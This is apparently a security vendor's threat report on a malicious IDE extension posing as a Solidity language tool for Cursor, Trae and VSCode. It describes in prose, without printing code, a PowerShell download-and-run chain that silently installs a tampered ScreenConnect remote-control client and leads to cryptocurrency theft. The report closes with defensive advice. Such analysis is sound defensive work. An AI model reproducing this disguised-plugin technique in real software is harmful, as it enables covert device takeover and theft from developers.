When AI becomes a target

At a time when AI technology is developing rapidly, AI has been increasingly integrated into our daily lives. However, due to the widespread application of AI technology, the various risks it faces have also increased. Recently, 360 captured a hacker attack. The unique thing is that the hacker used the plug-in script of the AI development tool to enter the victim’s system, waiting for an opportunity to attack the developers who use AI and ultimately make a profit.

AI development tools have hidden dangers

Recently, developers in AI-related industries reported that their data had been leaked or stolen, but they could not find the cause, which also attracted the attention of the 360 security team. After investigation by security researchers, it was found that the root cause of the attack came from the core tool that developers rely on most – IDE (Integrated Development Environment) software.

After analyzing the development environment of the victim users and combining 360 cloud big data screening and comparison, it was found that this attack was mainly concentrated on Cursor AI and Trae (including Trae CN), two mainstream AI-specific IDE development tools. At the same time, since these two tools are derivative products based on Microsoft’s open source IDE tool Visual Studio Code (VSCode), the original VSCode is also affected.

Event Analysis

After a systematic investigation of the attacked device, the source of the attack was eventually locked on an IDE plug-in called “Solidity Language”. The plug-in claims to be an auxiliary tool for the currently popular smart contract development language Solidity, providing syntax highlighting, definition jumps, information prompts, quick operations and other practical functions.

Figure 1. Solidity Language plugin

But when analysts traced the source and found the installation directory of the plug-in, they found that the src directory where the function code was stored was unusually simple, with only a JavaScript script file named “extension.js”. The code of this script was also very simple and direct – it just called the system PowerShell to get the file from the remote server and ran it directly in the local background.

Figure 2. Content of extension.js, the only functional script of the malicious plugin

The script will get a file named 1.txt from the remote server. This file is not a simple text file, but a PowerShell script. The script first tries to find a service or software called “ScreenConnect Client Service” in the system. If it cannot be found, it will call the system PowerShell again to get another new file from the remote server and then run it in the local background.

Figure 3. Contents of the PowerShell script named 1.txt

The 2.txt downloaded this time is also a PowerShell script, and its content is simpler and clearer. It only downloads a remote control software ScreenConnect customized by hackers to the victim’s environment and installs it silently.

Figure 4. A new script named 2.txt downloads the remote control software and installs it silently

This remote control software, called ScreenConnect, is a “regular” software used to remotely manage devices, but the downloaded installation package was “deeply customized” by hackers. We found that its built-in system.config configuration file was tampered with, directly hard-coding the key parameters used for connection and the remote control server address that the program connects to, allowing hackers to control the victim’s device without the victim’s knowledge or authorization.

Figure 5. Installation configuration file of remote control software

By monitoring the traffic data of the remote control software, it was found that the control server domain name was eventually resolved to an IP address located in Las Vegas, Nevada, USA.

Figure 6. The remote control software resolves its control server domain name

After successful parsing, it will automatically connect to port 8041 of its control server and start communicating, waiting for further instructions for subsequent control operations.

Figure 7. Connecting to port 8041 of the control server to communicate and wait for instructions

According to feedback from victimized users, hackers are currently quite interested in various virtual currency wallets, and some victimized developers’ cryptocurrencies have been looted…

Interception and protection

Analysts conducted actual tests on this attack and found that 360 can directly and effectively intercept the first round of PowerShell downloads after the malicious plug-in is loaded, successfully blocking this attack from the source.

Figure 8. 360 successfully intercepted the attack

Therefore, 360 users do not need to worry too much about this attack. They just need to ensure that the 360 client runs normally and the security protection function is enabled normally.

Security Recommendations

Based on the characteristics of this attack, it is recommended that users, especially AI-related developers:

•Install a security terminal

Install security monitoring software to automatically monitor, warn, and intercept various behaviors in the system. Get various security tips and suggestions through security software.

•Strengthen IDE plug-in management

Strictly screen various plug-ins installed in the IDE, and carefully identify multiple plug-ins with similar names.

•Limit PowerShell operation

Tighten the execution permissions of script parsers such as PowerShell as much as possible without affecting normal work. At the same time, you can limit the execution of various execution or hidden window parameters through configuration.

•Check software installation

Monitor the installation and execution of various software, and regularly check the installed software to check whether there are unknown software with potential risks.

•Strengthen network data monitoring

Monitor network traffic data. Once abnormal data traffic is found, block it immediately and trace the data source.

•Conduct security training

Regularly conduct special security training for the development team, especially for the types of threats that developers are more likely to encounter, such as “supply chain attacks” and “social engineering disguises”, to improve the ability to identify malicious plug-ins and suspicious scripts.